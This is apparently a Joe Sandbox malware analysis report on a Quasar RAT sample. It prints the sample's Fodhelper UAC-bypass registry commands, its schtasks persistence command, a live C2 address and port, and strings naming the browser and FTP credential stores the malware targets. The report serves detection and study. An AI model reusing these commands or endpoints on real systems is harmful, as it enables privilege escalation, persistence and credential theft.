Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dd5DwDCHJD.exe

Overview

General Information

Sample name:Dd5DwDCHJD.exe
renamed because original name is a hash value
Original sample name:6d6c9c719e2f757442374af378c343a7.exe
Analysis ID:1582962
MD5:6d6c9c719e2f757442374af378c343a7
SHA1:a58a2aa6dae2dbdf64472614985cac2adce4eddb
SHA256:444c97f6db0626069965d9e4ddb4bf315326954c51b123b3dc7d64084e7fb646
Tags:exeQuasarRATRATuser-abuse_ch
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Quasar RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • Dd5DwDCHJD.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\Dd5DwDCHJD.exe" MD5: 6D6C9C719E2F757442374AF378C343A7)
    • schtasks.exe (PID: 7360 cmdline: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7528 cmdline: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7544 cmdline: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • fodhelper.exe (PID: 7560 cmdline: fodhelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
        • Client.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" MD5: 6D6C9C719E2F757442374AF378C343A7)
      • timeout.exe (PID: 7576 cmdline: timeout /t 2 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • reg.exe (PID: 7728 cmdline: reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7744 cmdline: cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7856 cmdline: reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7892 cmdline: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7908 cmdline: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • fodhelper.exe (PID: 7932 cmdline: fodhelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
      • timeout.exe (PID: 7948 cmdline: timeout /t 2 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • reg.exe (PID: 8024 cmdline: reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8040 cmdline: cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\Melt.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7868 cmdline: timeout /t 5 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • Client.exe (PID: 7452 cmdline: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe MD5: 6D6C9C719E2F757442374AF378C343A7)
    • schtasks.exe (PID: 7656 cmdline: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Version": "1.4.2", "Host:Port": "193.31.28.181:4004;", "SubDirectory": "$77-cmd", "InstallName": "Client.exe", "MutexName": "704ccf6d-01bf-4037-a807-12a60509b1a4", "StartupKey": "$77-cmd", "Tag": "Office04", "LogDirectoryName": "$77-Logs", "ServerSignature": "NSAbIyaDVOnNFDkzGpUSuZuESeeaBTR0FVyR3XzKKpKVm2XEp11KXhLRgB7AnG2K/3e6DOyvoTJ1jLoidz3KtuFWMuVPYX0HOgKy7j86Km0iGHWjSpbPH3Ekt+4cHj2ZJe3NTqqPkPcUWJWSXbQkG+s59tFfhBtpWrgVyEFyemUkhrlVNc5P7td3TtrtOQs+IIaEnnkPSOCqcjkZZFN3dwfAvc0LSnJkw1zXpN2YVJvaHSd+uIxi9EjezmtgJawkWp4GzxmQJS3Pg7/hSuX1xUqembKwlk9owjULWtLtnWZhbl9hSmKLPVm5XjWRuqjjXwazA++7PUJ0ooa0H0THUUBNj9VS0op3shaVa0My2qBGUOYXS8z3qUXdFZFZTh0KQeeRwhLhsQ0pBfI8rmBNrCry+zTMorvU8t5K3UdZgnDsLETZLuVuXo7BQq+jKppoFs7uNNdum04fw18j72Y7GGHSmPFHq5Q8pqd0NfPtE90dkLI5xWeCBLGLSEWh7L37BVGGAf1EqdBrrgr6A+xwTr24hdpEQa9YUYsfYHoq4DGaw28pnst/yQ93eTTnVn2d4JpJxCNqpZdtcogzEZAUplsPMeAJbsO8QsNvA32VTnd/CLzEzgZkER3Gp0h3GT/t2AOifMhqQxII1Gb5BtwjITQ2+NKUjtOCck6C6shLzHo=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAP7MVinYG7Bp3TFCaecT6TANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTIyMjIyNDYzNloYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEArQWo0/U8Y+iecER1g4fmpySyrvJ27IFqh+4hpoOcxOWRg2MPgZoEpiKbDKmR3ybU4FnButfT/zFfD9r+2IytYCZDaYXxt1Z6Uh9liQaTi3xnQ3/K5LUjXLcdonTjGABFZb153VLUsYTX2jkI71X17RMNAMrxLDbp7pAQTa0zHLtA4nI+CK0TTHViT3iv6qfkPHww2s6Y+JGv0XBy8lsQAjRG5YBj7ta4/dUupzZ1+UQw3Ipf/8SqehU+49rkJRq6P39D5+2NTyoWZhRJkmZYMaFAmn0alYmwiHXg36D7T0RB9/khzOo5JQ5d9FpVWZUJJHtItHPChwBeToi8rT+ZDqVUmsHUpnmSK2/RXycYRdTf24MJ4gED0G69InjzW5qkCXfQH7/HLy0OYxP7iTVex+NLGzfqIyMDhDP+b72LFKr2UGwS3h0jHOYkF65yCNyMMAFvRjK/WWvMNO7LueSoCLX+ijLOMSs7XS0jMOZklObQMV9QhHy9XLeuKIMeDLBzB+NyLUC2ik64559Av9jqC2M5Ivd2sfj1cjzWdu2M4WM4HAd4A9hrR/mOxkQAtM6sRPiSufoUpj6JzwJjHwV53e26JuH7CAdHGZez3agrR9pxGpNbDBxCjpMPH4xB8I357QlczMKv0brho/F98JfHBps5VPMdnu2W8A0TeMZgJTUCAwEAAaMyMDAwHQYDVR0OBBYEFBgjvy7htPmbZGKaAGsHHUifFGuxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAHcDbotBjyWn9JWripLhOMzIvcAbF9/iJ2N4JMIC0GHWxzoNgh0IOkPb3PqUwT/NcSxbvVQVY3oftMX+ywh3ZzqiqZWGsQC/ZyhdKIsbahAX1OHCIxcIDHg9qhZUK7pLtOvJkXkUJ4o8Cs5sSxpHRj/46vmHGRRLkgV+2Ej3s8fygROrZUVJwY+UcfDAm77CyTz2BbveHlXiitPkfedJ2+IXSAX6KwVWJTOzTTykw+lJtzfIWQBO4H3z+mNQEXE47qikiH6pTF1aVSh24/S9LJlAu/w/RJ+PIFUslzgfz5wiMJzI9E4cHLXCaXoarscBV+Vga40IZ8TYa4RDp5oQ8clgm8JTCZMH/TaLLHbePZ/hSvRy0S7CkJPa0YPbCxqzf/BWqW64uhmiBpJbaP6uZKGqbNO9c+KDASK/e21q/ViZy4Qo7G3WGnZd7EXi1psG4zxVt8wF3Qhibp/pQi1tyfJDRhcRyIfc3YsaOrLDd89yJ/O2UfnN4MflCFAufBXLfkUycDZv26mvszaY9c/3N8F8JoLo4kDxLEYbJJq/5jDMWjGh6brCo7mI++Wu2tGd6v+32gqeaZXrqJCj6pMxZriQa11g/A8Ug6cSJDiAh+Spn8RpNUjMWXACvmPHfzW08YD2+pKB0nlrIf7KIKihl06p0W+NWB5yWjUvp6j+CFvn"}
SourceRuleDescriptionAuthorStrings
Dd5DwDCHJD.exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
    Dd5DwDCHJD.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Dd5DwDCHJD.exeMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
      • 0x28f14d:$x1: Quasar.Common.Messages
      • 0x29f476:$x1: Quasar.Common.Messages
      • 0x2ac14c:$x4: Uninstalling... good bye :-(
      • 0x2ad941:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
      Dd5DwDCHJD.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
      • 0x2ab6fe:$f1: FileZilla\recentservers.xml
      • 0x2ab73e:$f2: FileZilla\sitemanager.xml
      • 0x2ab780:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
      • 0x2ab9cc:$b1: Chrome\User Data\
      • 0x2aba22:$b1: Chrome\User Data\
      • 0x2abcfa:$b2: Mozilla\Firefox\Profiles
      • 0x2abdf6:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2fdd67:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2abf4e:$b4: Opera Software\Opera Stable\Login Data
      • 0x2ac008:$b5: YandexBrowser\User Data\
      • 0x2ac076:$b5: YandexBrowser\User Data\
      • 0x2abd4a:$s4: logins.json
      • 0x2aba80:$a1: username_value
      • 0x2aba9e:$a2: password_value
      • 0x2abd8a:$a3: encryptedUsername
      • 0x2fdcab:$a3: encryptedUsername
      • 0x2abdae:$a4: encryptedPassword
      • 0x2fdcc9:$a4: encryptedPassword
      • 0x2fdc47:$a5: httpRealm
      Dd5DwDCHJD.exeMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
      • 0x165102:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
      • 0x2ac236:$s3: Process already elevated.
      • 0x28ee4c:$s4: get_PotentiallyVulnerablePasswords
      • 0x278ecf:$s5: GetKeyloggerLogsDirectory
      • 0x29ebd5:$s5: GetKeyloggerLogsDirectory
      • 0x28ee6f:$s6: set_PotentiallyVulnerablePasswords
      • 0x2ff38f:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
        C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
          • 0x28f14d:$x1: Quasar.Common.Messages
          • 0x29f476:$x1: Quasar.Common.Messages
          • 0x2ac14c:$x4: Uninstalling... good bye :-(
          • 0x2ad941:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
          C:\Users\user\AppData\Roaming\$77-cmd\Client.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
          • 0x2ab6fe:$f1: FileZilla\recentservers.xml
          • 0x2ab73e:$f2: FileZilla\sitemanager.xml
          • 0x2ab780:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
          • 0x2ab9cc:$b1: Chrome\User Data\
          • 0x2aba22:$b1: Chrome\User Data\
          • 0x2abcfa:$b2: Mozilla\Firefox\Profiles
          • 0x2abdf6:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x2fdd67:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x2abf4e:$b4: Opera Software\Opera Stable\Login Data
          • 0x2ac008:$b5: YandexBrowser\User Data\
          • 0x2ac076:$b5: YandexBrowser\User Data\
          • 0x2abd4a:$s4: logins.json
          • 0x2aba80:$a1: username_value
          • 0x2aba9e:$a2: password_value
          • 0x2abd8a:$a3: encryptedUsername
          • 0x2fdcab:$a3: encryptedUsername
          • 0x2abdae:$a4: encryptedPassword
          • 0x2fdcc9:$a4: encryptedPassword
          • 0x2fdc47:$a5: httpRealm
          C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
          • 0x165102:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
          • 0x2ac236:$s3: Process already elevated.
          • 0x28ee4c:$s4: get_PotentiallyVulnerablePasswords
          • 0x278ecf:$s5: GetKeyloggerLogsDirectory
          • 0x29ebd5:$s5: GetKeyloggerLogsDirectory
          • 0x28ee6f:$s6: set_PotentiallyVulnerablePasswords
          • 0x2ff38f:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
              Process Memory Space: Dd5DwDCHJD.exe PID: 7324JoeSecurity_QuasarYara detected Quasar RATJoe Security
                Process Memory Space: Client.exe PID: 7452JoeSecurity_QuasarYara detected Quasar RATJoe Security
                  SourceRuleDescriptionAuthorStrings
                  0.0.Dd5DwDCHJD.exe.cb0000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                    0.0.Dd5DwDCHJD.exe.cb0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.Dd5DwDCHJD.exe.cb0000.0.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                      • 0x28f14d:$x1: Quasar.Common.Messages
                      • 0x29f476:$x1: Quasar.Common.Messages
                      • 0x2ac14c:$x4: Uninstalling... good bye :-(
                      • 0x2ad941:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                      0.0.Dd5DwDCHJD.exe.cb0000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                      • 0x2ab6fe:$f1: FileZilla\recentservers.xml
                      • 0x2ab73e:$f2: FileZilla\sitemanager.xml
                      • 0x2ab780:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                      • 0x2ab9cc:$b1: Chrome\User Data\
                      • 0x2aba22:$b1: Chrome\User Data\
                      • 0x2abcfa:$b2: Mozilla\Firefox\Profiles
                      • 0x2abdf6:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                      • 0x2fdd67:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                      • 0x2abf4e:$b4: Opera Software\Opera Stable\Login Data
                      • 0x2ac008:$b5: YandexBrowser\User Data\
                      • 0x2ac076:$b5: YandexBrowser\User Data\
                      • 0x2abd4a:$s4: logins.json
                      • 0x2aba80:$a1: username_value
                      • 0x2aba9e:$a2: password_value
                      • 0x2abd8a:$a3: encryptedUsername
                      • 0x2fdcab:$a3: encryptedUsername
                      • 0x2abdae:$a4: encryptedPassword
                      • 0x2fdcc9:$a4: encryptedPassword
                      • 0x2fdc47:$a5: httpRealm
                      0.0.Dd5DwDCHJD.exe.cb0000.0.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
                      • 0x165102:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
                      • 0x2ac236:$s3: Process already elevated.
                      • 0x28ee4c:$s4: get_PotentiallyVulnerablePasswords
                      • 0x278ecf:$s5: GetKeyloggerLogsDirectory
                      • 0x29ebd5:$s5: GetKeyloggerLogsDirectory
                      • 0x28ee6f:$s6: set_PotentiallyVulnerablePasswords
                      • 0x2ff38f:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

                      Privilege Escalation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, CommandLine: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, ProcessId: 7528, ProcessName: reg.exe

                      System Summary

                      barindex
                      Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" , CommandLine: "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, NewProcessName: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, OriginalFileName: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, ParentCommandLine: fodhelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7560, ParentProcessName: fodhelper.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" , ProcessId: 7616, ProcessName: Client.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Dd5DwDCHJD.exe", ParentImage: C:\Users\user\Desktop\Dd5DwDCHJD.exe, ParentProcessId: 7324, ParentProcessName: Dd5DwDCHJD.exe, ProcessCommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, ProcessId: 7360, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Dd5DwDCHJD.exe", ParentImage: C:\Users\user\Desktop\Dd5DwDCHJD.exe, ParentProcessId: 7324, ParentProcessName: Dd5DwDCHJD.exe, ProcessCommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, ProcessId: 7360, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, ParentImage: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, ParentProcessId: 7452, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, ProcessId: 7656, ProcessName: schtasks.exe
                      Source: Process startedAuthor: frack113: Data: Command: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, CommandLine: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f, ProcessId: 7528, ProcessName: reg.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Dd5DwDCHJD.exe", ParentImage: C:\Users\user\Desktop\Dd5DwDCHJD.exe, ParentProcessId: 7324, ParentProcessName: Dd5DwDCHJD.exe, ProcessCommandLine: "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f, ProcessId: 7360, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-01T05:57:09.322571+010020355951Domain Observed Used for C2 Detected193.31.28.1814004192.168.2.449731TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-01T05:57:09.322571+010020276191Domain Observed Used for C2 Detected193.31.28.1814004192.168.2.449731TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Dd5DwDCHJD.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                      Source: Dd5DwDCHJD.exeMalware Configuration Extractor: Quasar {"Version": "1.4.2", "Host:Port": "193.31.28.181:4004;", "SubDirectory": "$77-cmd", "InstallName": "Client.exe", "MutexName": "704ccf6d-01bf-4037-a807-12a60509b1a4", "StartupKey": "$77-cmd", "Tag": "Office04", "LogDirectoryName": "$77-Logs", "ServerSignature": "NSAbIyaDVOnNFDkzGpUSuZuESeeaBTR0FVyR3XzKKpKVm2XEp11KXhLRgB7AnG2K/3e6DOyvoTJ1jLoidz3KtuFWMuVPYX0HOgKy7j86Km0iGHWjSpbPH3Ekt+4cHj2ZJe3NTqqPkPcUWJWSXbQkG+s59tFfhBtpWrgVyEFyemUkhrlVNc5P7td3TtrtOQs+IIaEnnkPSOCqcjkZZFN3dwfAvc0LSnJkw1zXpN2YVJvaHSd+uIxi9EjezmtgJawkWp4GzxmQJS3Pg7/hSuX1xUqembKwlk9owjULWtLtnWZhbl9hSmKLPVm5XjWRuqjjXwazA++7PUJ0ooa0H0THUUBNj9VS0op3shaVa0My2qBGUOYXS8z3qUXdFZFZTh0KQeeRwhLhsQ0pBfI8rmBNrCry+zTMorvU8t5K3UdZgnDsLETZLuVuXo7BQq+jKppoFs7uNNdum04fw18j72Y7GGHSmPFHq5Q8pqd0NfPtE90dkLI5xWeCBLGLSEWh7L37BVGGAf1EqdBrrgr6A+xwTr24hdpEQa9YUYsfYHoq4DGaw28pnst/yQ93eTTnVn2d4JpJxCNqpZdtcogzEZAUplsPMeAJbsO8QsNvA32VTnd/CLzEzgZkER3Gp0h3GT/t2AOifMhqQxII1Gb5BtwjITQ2+NKUjtOCck6C6shLzHo=", "ServerCertificate": 